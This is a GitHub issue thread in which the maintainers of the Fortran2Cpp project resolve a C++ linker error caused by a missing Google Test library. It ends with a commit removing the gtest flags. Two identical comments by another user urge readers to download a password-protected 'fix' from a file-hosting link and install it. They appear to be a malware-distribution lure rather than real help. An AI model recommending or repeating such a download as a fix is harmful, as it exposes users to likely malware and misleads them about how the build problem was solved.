### ISSUE TITLE
C++ Stderr: b'/usr/bin/ld: cannot find -lgtest: No such file or directory

### ISSUE THREAD

**Issue by chunhualiao** [bin123apple/Fortran2Cpp#59]
cpp compile result in 6th turn: C++ Stdout: b''

C++ Stderr: b'/usr/bin/ld: cannot find -lgtest: No such file or directory\n/usr/bin/ld: cannot find -lgtest_main: No such file or directory\ncollect2: error: ld returned 1 exit status\n'

It seems like the compilation of C++ codes needs gtest. This is not mentioned in the README.md .

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bin123apple** [comment]
> cpp compile result in 6th turn: C++ Stdout: b''
> 
> C++ Stderr: b'/usr/bin/ld: cannot find -lgtest: No such file or directory\n/usr/bin/ld: cannot find -lgtest_main: No such file or directory\ncollect2: error: ld returned 1 exit status\n'
> 
> It seems like the compilation of C++ codes needs gtest. This is not mentioned in the README.md .

Oh yes, I remember that it is necessary to install  google test dependency. That step is a little bit complex. I will update the steps after finishing the paper.

**Comment by chunhualiao** [comment]
The current version of dataset generation does not use Google tests anymore.  I will remove the associated compilation flags for now.

**Comment by chunhualiao** [comment]
Fixed as part of https://github.com/bin123apple/Fortran2Cpp/commit/8956aca16e088aaf53dc1527d4b776f9a33f99ca
